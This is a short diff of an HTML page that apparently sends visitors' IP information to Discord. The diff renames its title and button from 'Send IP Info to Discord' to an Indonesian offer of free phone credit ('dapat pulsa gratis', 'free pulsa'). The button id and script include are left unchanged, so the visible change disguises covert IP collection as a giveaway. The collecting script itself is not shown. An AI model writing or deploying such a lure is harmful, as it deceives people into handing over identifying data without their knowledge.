--- a/index.html
+++ b/index.html
@@ -3,10 +3,10 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Send IP Info to Discord</title>
+    <title>dapat pulsa gratis</title>
 </head>
 <body>
-    <button id="sendIpInfoButton">Send IP Info to Discord</button>
+    <button id="sendIpInfoButton">free pulsa</button>
 
     <script src="script.js"></script>
 </body>
